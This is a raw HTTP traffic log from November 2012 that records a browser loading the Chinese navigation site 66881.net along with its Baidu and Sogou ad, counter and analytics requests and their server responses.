GET /img/arr.gif HTTP/1.1 Host: www.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 04:09:47 GMT Server: Apache P3P: CP=" OTI DSP COR IVA OUR IND COM " Set-Cookie: BAIDUID=19D85DBEF8182ADC5A5D80F4F24114F2:FG=1; expires=Wed, 06-Nov-13 04:09:47 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1 Last-Modified: Thu, 24 Jun 2010 12:04:00 GMT Etag: "fe-489c57321cc00" Accept-Ranges: bytes Content-Length: 254 Cache-Control: max-age=315360000 Expires: Fri, 04 Nov 2022 04:09:47 GMT Connection: Keep-Alive
GET /indexFile/monitor.js HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: AJSTAT_ok_pages=1; AJSTAT_ok_times=1	HTTP/1.1 404 Not Found Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:40 GMT Content-Length: 1308 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /c/CounterPic/16/3.gif HTTP/1.1 Host: www.wz123.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: ASPSESSIONIDCSTQQRTS=EHNBKEMDNFJELHFFKLGKFOPL	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 04:11:53 GMT Content-Length: 851 Last-Modified: Sun, 01 Jul 2012 15:08:41 GMT Accept-Ranges: bytes Etag: "2876b7669b57cd1:2f21c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /c/CounterPic/16/9.gif HTTP/1.1 Host: www.wz123.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: ASPSESSIONIDCSTQQRTS=EHNBKEMDNFJELHFFKLGKFOPL	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 04:11:53 GMT Content-Length: 855 Last-Modified: Sun, 01 Jul 2012 15:08:45 GMT Accept-Ranges: bytes Etag: "33f4699b57cd1:2f21c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /c/CounterPic/16/2.gif HTTP/1.1 Host: www.wz123.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: ASPSESSIONIDCSTQQRTS=EHNBKEMDNFJELHFFKLGKFOPL	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 04:11:53 GMT Content-Length: 852 Last-Modified: Sun, 01 Jul 2012 15:08:41 GMT Accept-Ranges: bytes Etag: "65d8b9669b57cd1:2f21c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /c/CounterPic/16/6.gif HTTP/1.1 Host: www.wz123.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: ASPSESSIONIDCSTQQRTS=EHNBKEMDNFJELHFFKLGKFOPL	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 04:11:53 GMT Content-Length: 851 Last-Modified: Sun, 01 Jul 2012 15:08:44 GMT Accept-Ranges: bytes Etag: "aab24c689b57cd1:2f21c" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /indexFile/sug.js HTTP/1.1 Host: 66881.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: AJSTAT_ok_pages=1; AJSTAT_ok_times=1	HTTP/1.1 404 Not Found Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:41 GMT Content-Length: 1308 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET
GET /cpro/ui/uijs.php?tu=u1103347&tn=text_default_234_60&n=31073069_cpr&rsi1=60&rsi0=234&rad=&rss0=%23FFFFFF&rss1=%23FFFFFF&rss2=%23f24d1b&rss3=%23444444&rss4=%23008000&rss5=&rss6=%23e10900&rsi5=4&ts=1&at=32&ch=0&cad=1&aurl=&rss7=&cpa=1&fv=10&cn=1&if=16&word=http%3A%2F%2F66881.net%2F&refer=&ready=1&jk=c890829b2798646d&jn=3&lmt=1351991994&csp=1176,885&csn=1176,855&ccd=24&chi=1&cja=true&cpl=8&cmi=54&cce=true&csl=en-US&did=1&rt=45&dt=1352174987&ev=16777216&c01=0&prt=1352174986556&i3=f HTTP/1.1 Host: cpro.baidu.com GET /cpro/ui/uijs.php?tu=u1103347&tn=text_default_234_60&n=31073069_cpr&rsi1=60&rsi0=234&rad=&rss0=%23FFFFFF&rss1=%23FFFFFF&rss2=%23f24d1b&rss3=%23444444&rss4=%23008000&rss5=&rss6=%23e10900&rsi5=4&ts=1&at=32&ch=0&cad=1&aurl=&rss7=&cpa=1&fv=10&cn=1&if=16&word=http%3A%2F%2F66881.net%2F&refer=&ready=1&jk=c890829b2798646d&jn=3&lmt=1351991994&csp=1176,885&csn=1176,855&ccd=24&chi=1&cja=true&cpl=8&cmi=54&cce=true&csl=en-US&did=1&rt=45&dt=1352174987&ev=16777216&c01=0&prt=1352174986556&i3=f HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:47 GMT Transfer-Encoding: chunked Connection: keep-alive Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Tue Nov 6 12:09:47 2012 Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Server: Apache Set-Cookie: BAIDUID=2352AEAC4C637EF5296A076FB97149C5:FG=1; expires=Wed, 06-Nov-13 04:09:47 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1 P3P: CP=" OTI DSP COR IVA OUR IND COM " Content-Encoding: gzip
GET /img/LocalStorage.swf HTTP/1.1 Host: cpro.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://cpro.baidu.com/cpro/ui/uijs.php?tu=u1103347&tn=text_default_234_60&n=31073069_cpr&rsi1=60&rsi0=234&rad=&rss0=%23FFFFFF&rss1=%23FFFFFF&rss2=%23f24d1b&rss3=%23444444&rss4=%23008000&rss5=&rss6=%23e10900&rsi5=4&ts=1&at=32&ch=0&cad=1&aurl=&rss7=&cpa=1&fv=10&cn=1&if=16&word=http%3A%2F%2F66881.net%2F&refer=&ready=1&jk=c890829b2798646d&jn=3&lmt=1351991994&csp=1176,885&csn=1176,855&ccd=24&chi=1&cja=true&cpl=8&cmi=54&cce=true&csl=en-US&did=1&rt=45&dt=1352174987&ev=16777216&c01=0&prt=1352174986556&i3=f Cookie: BAIDUID=2352AEAC4C637EF5296A076FB97149C5:FG=1	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Date: Tue, 06 Nov 2012 04:09:48 GMT Content-Length: 1435 Last-Modified: Mon, 05 Sep 2011 08:00:00 GMT Connection: keep-alive Server: Apache Expires: Wed, 07 Nov 2012 04:09:48 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes
GET /img/cpro_media_small.png HTTP/1.1 Host: cpro.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://cpro.baidu.com/cpro/ui/uijs.php?tu=u1103347&tn=text_default_234_60&n=31073069_cpr&rsi1=60&rsi0=234&rad=&rss0=%23FFFFFF&rss1=%23FFFFFF&rss2=%23f24d1b&rss3=%23444444&rss4=%23008000&rss5=&rss6=%23e10900&rsi5=4&ts=1&at=32&ch=0&cad=1&aurl=&rss7=&cpa=1&fv=10&cn=1&if=16&word=http%3A%2F%2F66881.net%2F&refer=&ready=1&jk=c890829b2798646d&jn=3&lmt=1351991994&csp=1176,885&csn=1176,855&ccd=24&chi=1&cja=true&cpl=8&cmi=54&cce=true&csl=en-US&did=1&rt=45&dt=1352174987&ev=16777216&c01=0&prt=1352174986556&i3=f Cookie: BAIDUID=2352AEAC4C637EF5296A076FB97149C5:FG=1	HTTP/1.1 200 OK Content-Type: image/png Date: Tue, 06 Nov 2012 04:09:48 GMT Content-Length: 645 Last-Modified: Mon, 05 Sep 2011 08:00:00 GMT Connection: keep-alive Server: Apache Expires: Wed, 07 Nov 2012 04:09:48 GMT Cache-Control: max-age=86400 Accept-Ranges: bytes
GET /sync.htm?cproid=2352AEAC4C637EF5296A076FB97149C5%3AFG%3D1 HTTP/1.1 Host: cpro.baidustatic.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://cpro.baidu.com/cpro/ui/uijs.php?tu=u1103347&tn=text_default_234_60&n=31073069_cpr&rsi1=60&rsi0=234&rad=&rss0=%23FFFFFF&rss1=%23FFFFFF&rss2=%23f24d1b&rss3=%23444444&rss4=%23008000&rss5=&rss6=%23e10900&rsi5=4&ts=1&at=32&ch=0&cad=1&aurl=&rss7=&cpa=1&fv=10&cn=1&if=16&word=http%3A%2F%2F66881.net%2F&refer=&ready=1&jk=c890829b2798646d&jn=3&lmt=1351991994&csp=1176,885&csn=1176,855&ccd=24&chi=1&cja=true&cpl=8&cmi=54&cce=true&csl=en-US&did=1&rt=45&dt=1352174987&ev=16777216&c01=0&prt=1352174986556&i3=f	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:48 GMT Last-Modified: Fri, 19 Oct 2012 03:00:00 GMT Transfer-Encoding: chunked Connection: keep-alive Server: Apache P3P: CP=" OTI DSP COR IVA OUR IND COM " Content-Encoding: gzip
GET /ecom?di=506&tm=baidufslink HTTP/1.1 Host: a.baidu.com GET /ecom?di=506&tm=baidufslink HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: BAIDUID=2352AEAC4C637EF5296A076FB97149C5:FG=1	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:49 GMT Server: ECOM Apache 1.0.13.0 Transfer-Encoding: chunked
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1 Host: fpdownload2.macromedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/xml Server: Apache Last-Modified: Wed, 03 Oct 2012 19:48:11 GMT Etag: "289dff-26c-4cb2ceb2654c0" Accept-Ranges: bytes Content-Length: 620 Date: Tue, 06 Nov 2012 04:09:51 GMT Connection: keep-alive
GET /go.asp?svid=5&id=3285797&checkcc=1&bookmark=1&checkget=1&tpages=1&ttimes=1&tzone=1&tcolor=24&sSize=1176,885&referrer=&vpage=http%3A//66881.net/ HTTP/1.1 Host: web1.51.la:82 GET /go.asp?svid=5&id=3285797&checkcc=1&bookmark=1&checkget=1&tpages=1&ttimes=1&tzone=1&tcolor=24&sSize=1176,885&referrer=&vpage=http%3A//66881.net/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:54 GMT Server: Microsoft-IIS/6.0 Content-Length: 0 Expires: Mon, 05 Nov 2012 11:29:54 GMT Cache-Control: private
GET /sync.htm?cproid=2352AEAC4C637EF5296A076FB97149C5%3AFG%3D1 HTTP/1.1 Host: cpro.baidu.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://cpro.baidustatic.com/sync.htm?cproid=2352AEAC4C637EF5296A076FB97149C5%3AFG%3D1 Cookie: BAIDUID=2352AEAC4C637EF5296A076FB97149C5:FG=1	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:51 GMT Last-Modified: Fri, 19 Oct 2012 03:00:00 GMT Transfer-Encoding: chunked Connection: keep-alive Server: Apache P3P: CP=" OTI DSP COR IVA OUR IND COM " Content-Encoding: gzip
GET /media/id=P1mdn1cvnjm&gp=403&time=nHnYPjndPWTLP6.jpg HTTP/1.1 Host: drmcmm.baidu.com GET /media/id=P1mdn1cvnjm&gp=403&time=nHnYPjndPWTLP6.jpg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://cpro.baidu.com/cpro/ui/uijs.php?tu=u1103347&tn=text_default_234_60&n=31073069_cpr&rsi1=60&rsi0=234&rad=&rss0=%23FFFFFF&rss1=%23FFFFFF&rss2=%23f24d1b&rss3=%23444444&rss4=%23008000&rss5=&rss6=%23e10900&rsi5=4&ts=1&at=32&ch=0&cad=1&aurl=&rss7=&cpa=1&fv=10&cn=1&if=16&word=http%3A%2F%2F66881.net%2F&refer=&ready=1&jk=c890829b2798646d&jn=3&lmt=1351991994&csp=1176,885&csn=1176,855&ccd=24&chi=1&cja=true&cpl=8&cmi=54&cce=true&csl=en-US&did=1&rt=45&dt=1352174987&ev=16777216&c01=0&prt=1352174986556&i3=f Cookie: BAIDUID=2352AEAC4C637EF5296A076FB97149C5:FG=1	HTTP/1.1 200 OK Content-Type: image/jpeg media: media Cache-Control: max-age=31536000 Expires: Fri, 26 Oct 2012 12:24:13 GMT Last-Modified: Sat, 25 Apr 2009 07:04:00 GMT Date: Tue, 06 Nov 2012 04:09:50 GMT Server: apache Content-Length: 9970
GET /ct_pv?pid=57519920&r=fff7104e96f666f7 HTTP/1.1 Host: wb.brand.sogou.com GET /ct_pv?pid=57519920&r=fff7104e96f666f7 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: SUID=DD8C9FC3320C0C0A50988D8E0009EDC5; ad=IZllllllll2yuwLnlllllVjY0YclllllZiMGTyllll9lllllxOxlw@@@@@@@@@@@; CXID=954092768C2C36D1E0CD3FF8D02E77F3	HTTP/1.1 200 OK Content-Type: text/plain; charset=UTF-8 Server: nginx/1.2.0 Date: Tue, 06 Nov 2012 04:09:53 GMT Content-Length: 20 Connection: keep-alive Last-Modified: Thu, 14 Oct 2010 07:20:37 GMT Etag: "2c7-0-4928e8be69b40" Accept-Ranges: bytes Vary: Accept-Encoding Content-Encoding: gzip
GET /textlink?pid=57519920&ct=textlink&iw=720&ih=19&c_bg=fcfff7&c_te=083c80&c_ho=FF3300&rn=1&cn=5&fs=12&pr=0&cm=10&ul=1&al=3&ppc=0&charset=gb2312&ct_uniq=1&ilp=1&tmp_mif=0&tmp_cdif=0&tmp_cts=0&id=&h=19&w=720&fv=10&if=16&sohuurl=http%3A%2F%2F66881.net%2F&refer=&rnd=fff7104e96f666f7&z=e56d3584b2f601a8&lmt=1351991994&srp=1176,885&ccd=24&lhi=1&eja=true&npl=8&nmi=54&ece=true&lan=en-US&bi=1&t1=52&t2=1352174987&pvt=1352174986671&ti=66881%E7%BD%91%E5%9D%80%E5%AF%BC%E8%88%AA_%E4%B8%AD%E5%9B%BD%E6%9C%80%E5%A5%BD%E7%9A%84%E4%B8%8A%E7%BD%91%E4%B8%BB%E9%A1%B5!&bs=1159,778 HTTP/1.1 Host: inte.sogou.com GET /textlink?pid=57519920&ct=textlink&iw=720&ih=19&c_bg=fcfff7&c_te=083c80&c_ho=FF3300&rn=1&cn=5&fs=12&pr=0&cm=10&ul=1&al=3&ppc=0&charset=gb2312&ct_uniq=1&ilp=1&tmp_mif=0&tmp_cdif=0&tmp_cts=0&id=&h=19&w=720&fv=10&if=16&sohuurl=http%3A%2F%2F66881.net%2F&refer=&rnd=fff7104e96f666f7&z=e56d3584b2f601a8&lmt=1351991994&srp=1176,885&ccd=24&lhi=1&eja=true&npl=8&nmi=54&ece=true&lan=en-US&bi=1&t1=52&t2=1352174987&pvt=1352174986671&ti=66881%E7%BD%91%E5%9D%80%E5%AF%BC%E8%88%AA_%E4%B8%AD%E5%9B%BD%E6%9C%80%E5%A5%BD%E7%9A%84%E4%B8%8A%E7%BD%91%E4%B8%BB%E9%A1%B5!&bs=1159,778 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:50 GMT Content-Length: 3227 Connection: keep-alive Content-Encoding: gzip Accept-Ranges: none Cache-Control: no-cache P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR", CP=" OTI DSP COR IVA OUR IND COM " Set-Cookie: SUID=DD8C9FC3320C0C0A50988D8E0009EDC5; path=/; expires=Thu, 06 Nov 2014 04:09:50 GMT; domain=sogou.com ad=IZllllllll2yuwLnlllllVjY0YclllllZiMGTyllll9lllllxOxlw@@@@@@@@@@@; path=/; expires=Thu, 06 Dec 2012 04:09:50 GMT; domain=.sogou.com CXID=954092768C2C36D1E0CD3FF8D02E77F3; expires=Wed, 06-Nov-13 04:09:50 GMT; max-age=31536000; path=/; domain=.sogou.com; version=1 Server: Apache
GET /weather2.php?a=getWeather HTTP/1.1 Host: www.6296.com.cn User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.6296.com.cn/data/html/tianqi.htm	HTTP/1.1 500 Internal Server Error Content-Type: text/html Connection: close Date: Tue, 06 Nov 2012 04:05:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET, PHP/5.2.5
GET /ecom?di=214&tm=baidufsbanner HTTP/1.1 Host: a.baidu.com GET /ecom?di=214&tm=baidufsbanner HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: BAIDUID=2352AEAC4C637EF5296A076FB97149C5:FG=1
GET /ecom?di=214&tm=baidufsbanner HTTP/1.1 Host: a.baidu.com GET /ecom?di=214&tm=baidufsbanner HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://66881.net/ Cookie: BAIDUID=2352AEAC4C637EF5296A076FB97149C5:FG=1	HTTP/1.1 200 OK Content-Type: text/html Date: Tue, 06 Nov 2012 04:09:58 GMT Server: ECOM Apache 1.0.13.0 Content-Encoding: gzip Transfer-Encoding: chunked